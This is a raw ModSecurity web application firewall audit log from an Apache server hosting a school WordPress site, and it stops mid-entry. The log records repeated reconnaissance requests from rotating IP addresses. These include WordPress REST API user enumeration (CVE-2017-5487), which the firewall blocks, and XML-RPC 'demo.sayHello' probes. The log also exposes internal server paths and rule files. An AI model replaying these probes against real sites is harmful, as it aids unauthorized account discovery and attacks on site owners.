ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746654327632224 3134 (- - -) Stopwatch2: 1746654327632224 3134; combined=1310, p1=432, p2=848, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33137717-Z-- --3be04355-A-- [08/May/2025:04:45:37 +0700] aBvUgY4K347NtBcwXKwDmAAAAJQ 103.236.140.4 38894 103.236.140.4 8181 --3be04355-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.102.18 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.102.18 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3be04355-C-- demo.sayHello --3be04355-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3be04355-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746654337394697 5611 (- - -) Stopwatch2: 1746654337394697 5611; combined=4132, p1=519, p2=3369, p3=27, p4=28, p5=108, sr=69, sw=81, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3be04355-Z-- --70c7b013-A-- [08/May/2025:05:18:21 +0700] aBvcLcP9GxxPAbCroFbLvAAAAFE 103.236.140.4 39254 103.236.140.4 8181 --70c7b013-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.44.118.210 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.44.118.210 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --70c7b013-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70c7b013-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746656301169373 3582 (- - -) Stopwatch2: 1746656301169373 3582; combined=1539, p1=478, p2=1030, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70c7b013-Z-- --4d0f0265-A-- [08/May/2025:05:19:23 +0700] aBvca8P9GxxPAbCroFbLvQAAAFc 103.236.140.4 39258 103.236.140.4 8181 --4d0f0265-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.185 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.185 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4d0f0265-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d0f0265-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746656363969622 3069 (- - -) Stopwatch2: 1746656363969622 3069; combined=1294, p1=421, p2=843, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d0f0265-Z-- --80c04050-A-- [08/May/2025:05:19:27 +0700] aBvcb8P9GxxPAbCroFbLvwAAAFU 103.236.140.4 39262 103.236.140.4 8181 --80c04050-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.185 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.185 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --80c04050-C-- demo.sayHello --80c04050-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --80c04050-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746656367557033 5364 (- - -) Stopwatch2: 1746656367557033 5364; combined=3995, p1=503, p2=3263, p3=24, p4=28, p5=102, sr=93, sw=75, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80c04050-Z-- --b593921b-A-- [08/May/2025:05:20:47 +0700] aBvcv8P9GxxPAbCroFbLwwAAAEU 103.236.140.4 39274 103.236.140.4 8181 --b593921b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.223 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b593921b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b593921b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746656447593476 3489 (- - -) Stopwatch2: 1746656447593476 3489; combined=1503, p1=483, p2=987, p3=0, p4=0, p5=32, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b593921b-Z-- --8a13e449-A-- [08/May/2025:05:20:52 +0700] aBvcxMP9GxxPAbCroFbLxQAAAEE 103.236.140.4 39278 103.236.140.4 8181 --8a13e449-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.223 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8a13e449-C-- demo.sayHello --8a13e449-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a13e449-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746656452305085 4985 (- - -) Stopwatch2: 1746656452305085 4985; combined=3843, p1=508, p2=3127, p3=21, p4=24, p5=94, sr=134, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a13e449-Z-- --2d2e7f0d-A-- [08/May/2025:05:21:10 +0700] aBvc1sP9GxxPAbCroFbLxwAAAEs 103.236.140.4 39284 103.236.140.4 8181 --2d2e7f0d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.176 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.176 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2d2e7f0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d2e7f0d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746656470343756 3005 (- - -) Stopwatch2: 1746656470343756 3005; combined=1472, p1=482, p2=954, p3=0, p4=0, p5=36, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d2e7f0d-Z-- --a3e85e18-A-- [08/May/2025:05:21:16 +0700] aBvc3MP9GxxPAbCroFbLyQAAAE4 103.236.140.4 39288 103.236.140.4 8181 --a3e85e18-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.176 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.176 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a3e85e18-C-- demo.sayHello --a3e85e18-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3e85e18-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746656476738992 5912 (- - -) Stopwatch2: 1746656476738992 5912; combined=4333, p1=558, p2=3627, p3=23, p4=25, p5=59, sr=94, sw=41, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3e85e18-Z-- --fa82cf33-A-- [08/May/2025:05:21:18 +0700] aBvc3sP9GxxPAbCroFbLygAAAEQ 103.236.140.4 39290 103.236.140.4 8181 --fa82cf33-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fa82cf33-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa82cf33-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746656478519269 2896 (- - -) Stopwatch2: 1746656478519269 2896; combined=1290, p1=422, p2=840, p3=0, p4=0, p5=28, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa82cf33-Z-- --4a88383b-A-- [08/May/2025:05:21:25 +0700] aBvc5Ss5rYyn3jlLjjK9bgAAAMA 103.236.140.4 39296 103.236.140.4 8181 --4a88383b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.198 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4a88383b-C-- demo.sayHello --4a88383b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a88383b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746656485851866 6324 (- - -) Stopwatch2: 1746656485851866 6324; combined=4615, p1=621, p2=3812, p3=32, p4=34, p5=70, sr=77, sw=46, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a88383b-Z-- --5a9e9e57-A-- [08/May/2025:05:21:49 +0700] aBvc_cP9GxxPAbCroFbLzgAAAFE 103.236.140.4 39300 103.236.140.4 8181 --5a9e9e57-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.177.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.177.90 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5a9e9e57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a9e9e57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746656509873597 3484 (- - -) Stopwatch2: 1746656509873597 3484; combined=1464, p1=485, p2=947, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a9e9e57-Z-- --c9a42051-A-- [08/May/2025:05:21:55 +0700] aBvdA8P9GxxPAbCroFbLzwAAAFc 103.236.140.4 39304 103.236.140.4 8181 --c9a42051-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.177.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.177.90 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c9a42051-C-- demo.sayHello --c9a42051-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9a42051-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746656515329034 4840 (- - -) Stopwatch2: 1746656515329034 4840; combined=3715, p1=441, p2=3057, p3=25, p4=23, p5=97, sr=85, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9a42051-Z-- --2be7381d-A-- [08/May/2025:05:21:55 +0700] aBvdA8P9GxxPAbCroFbL0AAAAEk 103.236.140.4 39306 103.236.140.4 8181 --2be7381d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.167.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.167.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2be7381d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2be7381d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746656515632869 2079 (- - -) Stopwatch2: 1746656515632869 2079; combined=1005, p1=309, p2=670, p3=0, p4=0, p5=26, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2be7381d-Z-- --f9a19478-A-- [08/May/2025:05:22:00 +0700] aBvdCMP9GxxPAbCroFbL0wAAAEI 103.236.140.4 39312 103.236.140.4 8181 --f9a19478-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.167.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.167.198 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f9a19478-C-- demo.sayHello --f9a19478-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9a19478-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746656520877320 4671 (- - -) Stopwatch2: 1746656520877320 4671; combined=3699, p1=414, p2=3096, p3=21, p4=22, p5=86, sr=64, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9a19478-Z-- --f8b67b52-A-- [08/May/2025:05:22:00 +0700] aBvdCMP9GxxPAbCroFbL1AAAAEA 103.236.140.4 39314 103.236.140.4 8181 --f8b67b52-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.13 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f8b67b52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8b67b52-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746656520882497 1977 (- - -) Stopwatch2: 1746656520882497 1977; combined=973, p1=336, p2=610, p3=0, p4=0, p5=27, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8b67b52-Z-- --ce01290a-A-- [08/May/2025:05:22:07 +0700] aBvdD8P9GxxPAbCroFbL1gAAAEU 103.236.140.4 39320 103.236.140.4 8181 --ce01290a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.13 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ce01290a-C-- demo.sayHello --ce01290a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce01290a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746656527149701 5337 (- - -) Stopwatch2: 1746656527149701 5337; combined=3986, p1=479, p2=3292, p3=25, p4=26, p5=95, sr=68, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce01290a-Z-- --a3472c0f-A-- [08/May/2025:05:22:12 +0700] aBvdFMP9GxxPAbCroFbL2AAAAFA 103.236.140.4 39328 103.236.140.4 8181 --a3472c0f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.167.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.167.13 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a3472c0f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3472c0f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file 